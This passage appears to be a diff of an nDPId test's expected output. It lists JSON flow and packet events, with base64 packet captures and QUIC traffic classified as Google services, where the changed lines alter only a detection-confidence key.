EsGbkUEBsPWaFNAQl0rYQv4OIQSLLLDbtnqJSJtFqJvApbEkL5FOujphAtNX4TvOYetM3s\/ZH5TkEvzT+bgZWz2mB1oMOoQPy213DWxLIhN9Sus3pIVPH9KUpLVArxCusIojjl4y\/CVvWA5XX0iWrENm1HaA6F521QuNa+s5DzOv42QgWOr+s5uNKSTFxAahQlQrNplOZsHircGL1XR+n2uD2gTgWAAY3b2i21J5cYoe0Z\/jVWlplRHgm1fBm8iBceAe+i8eGjb4bPc5PfJZ8n+JrHrN8SDylfFnIiRNE8ID8KN8lkbNu3\/oS3Kih\/K85WFq55fup233gxsGiJl3pqoHcF8IRFeJ07vNzBh1QaRlhGdke5sCCm3DG3xbt+UWW7rCkqr05j2zGYZdejMwOKkfbRf6NbqQKPeIcLIlv2bkyG3CDxjjE97A5SRMMjRaI2D9gkNO0\/wn3W0x5srM6qZB5BFLM7YG15trX9AF3w"} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621417629532,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621417629532,"pkt":"AAAAAAAAAAQApuCjCABFAAViWtRAAH4RzqOTxFoqsVYuzvDPAbsFTrDqwv8AAB0I+raMAglwITcAAEU097Xe2il2Zegu7U45BZ8gKfm75BdOnPJC97WfnE5KscE98sHvgzGhWttrfuN5Zw6V0RznV0lHr8X6WifmddIwLz9dgmQayfKTYym3Ekq7+FTfsVbmdLv7iDTySVEQT3U6aJZTVVfr48rzDdUlbuOabtPNfF9PK4wxRo28Hv8rNIeQLcDYX1ZhINEmN+sLvvHwjXJJn\/mGzxs37Wo7yOZbGkbY30QHlElqBOAjfC6VA27GzLEtJY\/bgqKUM6kS54RZZNzg5pKpLNlhxgP248e2xlGMNOmp4fMFXgmg3EfYbmnl2iWasHW8AkLql7Ucnm9wslVj\/YWb2c6IF2fyJjiByU3v\/tWqKcs4QGqfKnNSz7TAvliCZNV6Zo4gfpjCqzFPRaJI4yeyyqsAh\/yIYVP9ZV+w7uilAeMXgI+K0KIlxsOhizEgVDitG\/KAo9LOeN6fomCXq4209QrcrNd3XMwKvH9b188UgNv\/jRvXciyaJGIyMgJ7mamyBtbMq07La5hMyvo0mSqFOXeW1vGdKnMpuiGY5RTAHMnhNlkaZqmORAjp34HPN8n4vG44MH5AJ7tXiPcaAMzbgdmd6ox3fd0BfTrlccudwRllV1uZTxS3xRBBhwWhqTZE4FhxMXqd4endwazGj4NY2Vq7gD8YwyUO508LgWL2kYAd\/HfPDFLaaugd7M4tl4hSFuXNenTPDtb\/bRXBfDbvsb6xXiRig92+oFBV7pEoV5L\/yiJ4P2gax0Ac11TG31dQqdzo9z3YfYxfMa\/+8LYBIBydV8pcGIzVQDhSjN2LC5nUQOTcNfPU\/oVh0Ybk1aIMEU85MfYtwrsAgUEMpEGProetQB0mTzcYq+lEmbIIU8WPencLFFFL9uSVHveeIfGWVYNsJ7jljceMSgP5H6cv7CnQzsqS8dQ4uaXalyrjBXDSyJmCkDvaY220xAc3pj12kdE4BvFmAtStxWdtg66AiG7qv91s5V3en6J6UAronI\/KmR8EOk5BiV2TYsFERt4G27JNG5X\/AJaZ8VwtC2WsqvDKaMKYDTCCbRtilBnZ79PJ8INFhsaJtQDLjVGnL0+0lag21H2c0AgRlVIciNuUToDrQp+pYnpr3L\/mM63uQTkvv5eBIAP7i9VCEUjMABfjlzuA4QlRNUQ0vfIchW72uzMqFErT0XMVPnKFlDHN9TDNIkKHDeKZQaWZA\/OfMsV7evfLcQ+ddG\/xKNaoq8806UcjLdGTZEiKme6xLw53P6MT79sTHldTCpjPaldQ3tMH4EIg1InZbS5ktmIvlLQ2zHCeJ+cCrcDav1P0xMr+DLvH3rXDc1LTF\/hYsBxIYeS7vsQF07Zw9I0Aabf0GjuxOlwnW2Bt8iPysdcUeHkriGdeS3Czvq\/nkZEaGKcHJEnfklzqeTz2bYQ+SkshE9F12pfc0agQ0tbVdAnKaEKIsSgzPUMt7MgzYsL9AUkoIblqKn2hXfFXW3gr6XbSi5TQygflSMy28Bs+5OghyrSNcFcOe8e+DTn5mmzjD5O4rsNuXEgF7wS26+FyMgZbWHqX8HMifw3qMfcAQ1nT3l97zTbszeFs6\/goTc7uST7XEMKSKrS2lP7e\/ELG11fN8X22oM+TfVd0wylz3v0e6ThdB\/tMpVkNfw82FE39BRdoKw04E7yZ9lgCOyxJvMvSEQRhX0eoTiGgfBQDAhtTklq2Zr0UEwX8LiDkDQg8kHbX+ady095CUYxnxCvxjTB8g7HIHtQ37uzrFXIL6Nxg8bDtLpiJue2jB8lwh4plomig"} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417111064,"flow_last_seen":1621417113176,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417630732,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621417111064,"flow_last_seen":1621417113176,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621417630732,"l3_proto":"ip4","src_ip":"133.205.75.230","dst_ip":"208.229.157.81","src_port":56528,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00595{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":9,"packets-processed":8,"total-skipped-flows":0,"total-l4-payload-len":10800,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1621421253470} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621421253470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253470,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPLlAAH4RBzKokEAF1Bb289hQAbsFTvjXzP8AAB0IFOutyi98gDkAAEU0QEoUNnfb6spEl4sOhm7a3kYwPyh0twGQme8gnUbSWjlTM0eV\/33jZKgt8R3qtWDm2zSx\/rpQpEqQQvknW76YTyqy8lhhBH0HTupzxapnAU360wL\/+pHUQa9kkbfGs+rg0fJIwO92cTdSFU4vLU7xVz2fVMJaMQH8aHE\/1fVdWPC5x1T42ZLsnrxIMQ5wxIFrryrh15fMsCUmzvgSHxA\/i23NsVEQK0FaymSQ3vTxzLlBUWH4BZEKhwxODiawYJVn6KqbmqIqOPZjXiYZhiN\/Oc0\/LeCyQFaH1ri9xPnu4k\/db5yW\/Vm5M7J0u3m8iCZTpmZh9UW7Vz+Tt6ZtpNNUgyHlXEXFJ93VOxKXczX6MviwyGemHWSQL48Z\/padN7yuSlVEbH4WE\/x\/ebW7zTY276B4XQ+wlkch4ZzVURSVv2IJCLTAANRAmruSTCorJVR33qh+1laWpf0XjXQiid5xdrcBQeDZrONgOO69EM9SiLwEVtc0TpitDpJidyT0U1tQrFl70d\/XEPdy6sl8efWo7ZCqMlidLhPlq3NrVHxg4+Rm0hcmtJgElwEuqTGiLadNGhoT7Yo7j8pSYgNw7GRtSquhp7H3+FF2Y2bFNX19Z9+rRsJB4pUiilB5tu0adouOMnwmGTBRsatrnFOOtA0F2vX+LGN0MZFmEF5dpYuvWiLOa+K0fw5uMZaD1DwO81ez++YVlEQYMcGk8nRbrvkTr\/h1NjMg4AGD90jQKUb4FofQXWaVczScZMMs2v2AijtxxRDHmaMhESOLxFfFbAGY7GSyIn06ETBx10YXRTWxeT0eUKlaLwKeXgT1f9Nzee8owqgOKrkqV2dKYlj65fZbe64rFKZ1qmuSQpeN6luwI34bKSC\/P1YZm224OWk7dK8zYb6iVGqzON\/pvHnYbfT2ttIlhWIYxtY8Ju6yt1zHvLgcU9f83bCChlVephnGaWCxUwUlXnYZevAlJBygTGyZxTz2ZSb0ie32uT7qgPEA8\/VhOVmgfgz5uz1CkH7wK301uXB6Jd+vCV5C\/oxE\/jofm4fBRgusDmoz+6N3GpdbS6mlSoo0uqerAGszdbsmbuicOljSko4OAeqWoT+mGW7afPjx5a2FUCfO2SrBsu8hZPpnDhlhRCeKCJQcAHRB7xgiDd9eCcdbKD7Wu6I5NAMZ9c5cy\/ihBVX35Z+UgC3RyusmI0NtKYhjUDswCM0eyBoXLaZPl8INR9v1LW+yvOTZym8K9Aj0qNkha5Yzfvxik20hZiRqz1bdL8xXLCFYqYMYQEadOjp3L+P6FsQzEDaOxkrn2NuRIxBUQl17JREUFH0XnFwFnMT7z5vgxqMs+\/cTusvocWbp9TisAPxAunu5IgIhjJTjwzvXKQEqGGTx\/Uv95lseYEkyPjUxRZUqo6ayvxQzUbD7WzEPJfWp4V0dKCqk8jMcfr4gKrj2FSp8Pp2y\/+11ISOglp7xB6eIZFO0ZgRIY37WC1adnktqCSKXkgYJUGB+Oc8sMK4ta5iGShCsKCGNc84cXtiEBSa78agZzOMcgLZMHRXRJQcxDXBaC6GCHQXnLhoom2lIO8IpQOLCvA+fkPsBsI1oOJHnHV8O+hHfPFWWAiSD\/PB9nE4NwaIPKU4ZyWnacfkkFlYLZfqca8KZX4UtWN\/IEVTbG6\/oU7nJ0oyYFSxJfcA+XMb3hdr7h9ytVk4VGIeEwTkm3q4IbP0kGL00wYVhVU92VFVVNJemgeHNnaAUtTEkhmyuDDVqFnLFxbtyS6nB8YnwnujNnjXs"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253470,"flow_last_seen":1621421253470,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253470,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621421253509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253509,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPLpAAH4RAAiokEAFhcpMaf3EAbsFTviHzf8AAB0Izn33GI1xCTwAAEU0Q2KPp18EaD7CNRYkzOIN7dKmyWbS+N+cMemkf0psuzAGPfIWZySwPChV53Otv2dvXoDe3uezGPqpumIIkBf6E4Y8ZQDOb1kq7QnyaNj76pl0Rg6iP52gI2ik9D7s1o3thkJPMbsfxV+fuIPAKjePBjQmUP19frND2eTijGA2Jo0+u9aOzf5exzhhFq\/6nELW9tIN5cnw1mNp97ad1+XFptBiaaHUht\/AwUETMgLsBZ6XrHBGlpBY2lK8op1hzm0CnYVtS3Djsl5T\/wl54X2bN40BKcjIeQUAIe+9lSfAyX9VzGt1lyeq7sDtfGOULnyc3MRIbszfJgkdcma4KWIGUispqWzhbI1x5e\/RjTMlYyCVLmuxtCNhv9eaj9oPhvwV6QA3gM9QoCLiA0CWKH+SJGX2Rw5rZxYoMKeut8jwQsj+lIDaZR9I2\/AyKbpAZBbM0cPn5VbbglsRXZxJcp2ZEFpU9VJWoFGfCqiok1ySmzzALJ2o9fBW3oS1MBkHpHdYLwXsXSSHZum4zp4LAa6hwGEqhfT3QKMIosJCyQXQx90hg4FPeCfhcCzS0yMxKuIS7muPu13HLa3vp6BZSjDm+YGM2\/EP2rfLAV\/u73iBfyrpH4MVfT6XT9GH6DxrXWXPtmgj3dd4ZDJSS2EE1yZ7NzZKZHIzRIJhx+M60uskyfvEmdMlqpu42sPL14XVPHdNYMnoUS8X6WLni0o2VZmxQk3SYBjLMZKHNJZHUGBqZyOnDiDJEDUgCVpgpbyumDZBrRfKCG8xPvowcATyQ6821WIR6CIzs8Om8jqqi0JAvkN016aaA1p5ZCJQtyIP7RVszaos5bQYBNnQzPdcPSfCMMPRbEcbBLR\/8PEjZSJVMTynsuFnVR9jIDV8r\/dX3HTmyKXTIz0yNwtPT4H5hqTdaTXb7oaS8Zarj3bCmVeadB08cU+k5BSQkWcmvSsbxQK9L6WXdRC9SodhjDB9zefiVEPcSl7soHeKsNvYTyCkd\/XAIWMwe3bRjY+Kv\/KQy8Hwi5otEn\/W6Ht26F+Edg2+van4m7BF2EhqU16TwOM2sNd+iloXCcatqE\/C3MKqQU0Mkp2P+yV7oFIESvsIr0RB7rv76hjn+agd\/IgZmvvKb7bk9hq2XrH0HI1yi6DgeQgXvNKOZmzlAcpcvnqKhOiyX1pKXCxj5WdM8xyZrw7dWBYG9J+ZB2jRzA3N6g9gR5j+cHtRybtWCobPi0uMCp5Y\/TwozHIDGhNtykeb7ruqTg++bwL4cJPnLkfBMRka0gmne2r23CHGqUhUs182QVxVo33BcapLgO3qmkaZWUAfgES6E9cYn70KRY9mjRR5JB4LkRsmI2UaT20HAZw+DxdsM5YLqgbKe6dhNV2IOrhV\/TxAVxh6mwBPFC3umIWlZnFUvPCLyY8UM10QQ71eYC1SJ9eB13EtUmpWxQLGyueBG7P4\/oLKTc8PuLFHXfG9dQSOw1wE33A+f\/cnDT1FhhN1YqVpJQdPwJ4Wf5eVBxsn9JpIRrPWbarviWoroALVlD67VbRZJNKwOmE1HEEKRQZwrLkbev1NeFysxZPm4Y3TUawK2sEWayDygW6x6RN0NNG2Fay3n6wsNuNc5zitBxQaUj7zNSVElsX4h6XDvK98\/ECQwIKitJALgcMqiEiqaEc6pa+ihQlR1KKvzUudiOciEKxejDPhTjufOq\/UxVIzxEe1epyXEZvbVAZDgleZWCCPNPFEFpRRnINh23vNKajIxj\/Lj7QDAzP1y74FtJQ6jIyHxOrz"} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421253509,"flow_last_seen":1621421253509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421253509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621421253804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253804,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPMJAAH4RBymokEAF1Bb289hQAbsFTib0yf8AAB0IFOutyi98gDkAAEU0cgaq22OVD8Dk3cOFWT0xE9g+YCtQyxjYAZuBA+biQ0qlLk4G4l4FhrZTdWwEHJxix0i32WGF+VFP6SA62mk\/ahCh08zZkteiAklY2im5lzs3+hv5CXVaBoCsdKzK43351bgh7lFz2rLxgClTUrt+ggkqZgyH3xqh52dtUrDyoAHPTLnCu42bYt031EP3XjXnQN0tMqOu6lBcFDhjD4aNjqQ4gVCp9D2V7BmRO3otj4hId4G69dqomvKCMk352TcjhRI9Y\/b1HXLPEwZJR5SMYjM0bHHNJ8TU9yEz2sN8hXpEtMivH1XdJw0Eh8yYm64H83Y0HweIMWoyJiqpIlytTnrgkym64mLXXZYZW20KwPHeajlZF05XF3+pFt+uQ4GzrV5Dcx3AxUpXpEdoKl3n0ELxD0JH5ljs0a9w9Sbz1XKL5rFy7vCM8UkbGTH6qJsw9yuooY6A9x3BRJQldn\/cjpkxSonTfoT4ntKav5Abl2PQ2R\/XKxdCsedHmqW3DEd446DYQ3V85\/1reu7YDBrYnSyXTqTmbkWgxwxd8QGgoAa5urrS4Odki8E\/vxPzpvhWle2+YavjiuVnuPplOSMtA6eRixeu+Twyp\/mNZvJOkN9V44x6h72ppz248KXCbVBzRH+1a3Iw2Xt2l83WqoJ1ekOv8wHN6\/oiQJoJREH+g4zwPsZOsNyZDHhogPOptnRw+QNIjvRsgAplHaOx6D\/aGIthoZ3wqTLG+A+DTy0A7fbLu\/5uA2OrVkih8zEFgbKa96QzE7xsqMQsB29SUtTTgtaJ+x6DDlTxsS4y5GvKhs5RqCJuqJHJsUqQ+7qZO1IlfyqPjfQ4TdX3QR4WMaYivWpDgEtSZdNrgxDq2rS0MQKGr8L9tinW33cwo4ycFk5CyESoY2JbgbQLKBayMDiWClTvZot+D9gQ1USNgzNYyMBTHtywu3XkQJpOb6Cu+Cndw7HuOQ148pj8juCxBmSiBwgMqay2jsiMwE2rp2FJfE2pZCpCtkbGUbTD71AKVtAmD4PfgtOBCxaFvaclNBN01TZzkSP3ySV9xnlyk0aicuahfnr0uqssjLhU2lGOlia1+DO56SRT\/clcAVgh6RL3+lpZujJgQPm5EcCP+wloP7VOsnzWGwL9wZ7hJ40ht20W7jRVj3M6Els4r8Cq410yu5FloDOrNepfpbxjkZc6ldqZDdLri8F2g6JJ17oGz0uM4ZxyqgwoLWq7U+nURI2WoUDTSzDrhufyUwR4DJ9ZV1quggqjhetj0pzAZYuRLflR0X47yy14dCpQ\/vVyn1z2ua4Ul1zLKn5MiWFnBJIu6nyxsGQcno71kQag30voXKBH7HnrnnqUlbqOkjLEl5S\/FyD25Vd5cXtgniVi6A\/QPlDEt7HGYkYWr7\/lkpumd4\/NE+Jp8u8oDIJ2Pl+kBJ\/VZvw2TrQDNhyPOtdvHRPiEX8B8fs+MFSjeA8jQipbDbOQYT8shK9HjK1kt12l1A1WeA2E3iBlpveLOL5cYs7Ony3vhCFnJiyDYilQrHHcfZ4DT7xi8UHB2ER5kb0BMJsGRBThDiMxgHeTo+e7mFH8tDgNfGqLuRHyVlf8NgieuPUXEgyKmqYEc4LvmX4l2717+gqPnFHj\/U1TWUHnb92m5p6KStXy9LMrfKKfgW3hZcvDQuM0RslMbJ8u36V\/B9KSp7x2ODcgpxNNuc+y4vHSpU+\/5E4AvDNNuskmG4wvM2AAovGTD43c7ggngGXtjGnBtB4EnktPIpxqtYgo+FpqvKts45sp"} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621421253809,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621421253809,"pkt":"AAAAAAAAAAEAnT6cCABFAAViPMNAAH4R\/\/6okEAFhcpMaf3EAbsFToEwzP8AAB0Izn33GI1xCTwAAEU0rIRdWSpQJq8RNm\/YHCWv+5lOAS3ExdrQfSyR3179\/1dRds5Ne7rTKilnr5qOATiPuwy9kvVwvXmlvh9A4pBwrdy5rwj\/oK+soxKE65UpWeIIcbWAdsENETDsJvZbt2iOx1FT02Zh0k4wZRYa9T1mqEIw9vucjUxsVJqzuUcDQocELhq992N4Y\/d7WHUCkfrvzFkWLhfQuDRyyFD+FKVASnwCfjWwtYzJWfj8xdfdTc5foWxQy8HwatcneUH3Xe7KQloP91UPff0ZYs++gTR2OGCqiGo9QElgV7ipEPa\/a2VVjCezu0CEeDpnKAtNRmt6Q4uTlIuuLMwbpsrTE0g\/MqtsqQu5OpuusA8+8yooJk3wiUUBIcxT0LyFbbJBiUpy1jybiKvHv7sxWdofXLuT2tOVm\/gYEKYpYhJ2fQxRlq05FJNYAJ3x+IPKgL4hZDLQvZau5wz24pWxuyqaqk\/7pdJCP6tcxGJEigvqrGszDAU6Vnuxr\/raz+JVrdGz71r261HwLy7jCLV4GVAGwqXYjimp+lVj7ZrdOYwdRbkgTFkqZGqGyKwNKcvkP\/vIHt\/aqsMYIwNldiK9WOSo4NjVWqS9IQGKVhUKZzlXrupygWzjxqeGR5dlZJFEihDxxcQCXNUgswqiXbBiU7jvlnjci\/Wa5nSBAjcoxUjUtEV\/Hmpt8r23oBWTbgRE9axl1IWGAHI2tDK8zoknUr82ajxFez+Gh0wDV\/MCeDcDUfVqAg5v+qUe56To\/xvqvZFgwQiXcqe7gIfrPgAP8QI6n6FSGGFXoDNKL9zay3oJBh5pSSHq1DCM9w1SKpHiwhq80tTvMNgKeuRDzvkzeQ9vDiuRQ1F0\/isFVcoHn1e2\/Qp6mJR8Lg6OjGTB5n9wJt0GQq6bX9nGsaRw4XAmHHPfPtRRrzAXpU5KuOSCBB0+ShvIxmEYlsFhYFhXfYMIaUqR+yhlwtPSDafAHcOechwW\/ra57z3xNbXAdhHXxU99F54Cb3HNcttIif3ThTZ5o7GOV8r62PLfOpQ7VeKZhnB9VXymajUkSEgKnVtYFRaDjiFok1vqKqx3wzDiPNSqp7GpEl\/yN2vdzXQrfZOp+0yTLLStC7aJ2V0VsJ8NuI036psv9S1AnkXkUUyeZqLHQXmxWBVEUWEJ4aw\/ZZNwpJ2tHF897PYgr1CTWWw4CttMzQLaBZ51eX4RHRn9kLCgvlyq1tMUT+4YjYbnn8RYbz9eqTM4rSN8tz92KR9Fcc0\/dMjAdKRSNurGmNpDEtITPjaUb1n5VBZmMevuy+YULm\/K0LRcgr3bjEgYFGgamvIUyTxG2IxIE6DmCy+rl9rr5F+rE4LgtHzkBPE4gC8ikWb\/UxYBUsyEZNAp4YWExPD5uevZdPSpVZ7j7K7PYss5uBH8TZFtKaqXjAaBFvo8+Iamk14Oh0pgrgxGqB5+UxZOAubhS2tMB7iGe14ZAIAuXL57InGtj0kim3J\/3bjlX1lKzHdAjJDSJtTIdaauSA4wIm+5djes7nIN5l8yHcP+jbpw79vdXui0DIhf0YIIf42Ya8fgEVunYI3yggTOU1wruhfAOOAN7F7YY31Q8MJfLj0qlihs1B3a0b\/W6jVRhMJ+QZ5ut1F8vzQhkHEbOYzm8VcH35XK0f1lM+HrHe56zOhDCcJ1Uiq\/nKgQwd8FV+HuWjkyGI8NRs6aas3Ro+mmhQzK2gIzxAmNbNSP65H2kIq72CE6rc1ZiknuHgwgzCMtoH6gzt2XSxfShl6CHvNrwhQToP6hE8gE"} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621421257105,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 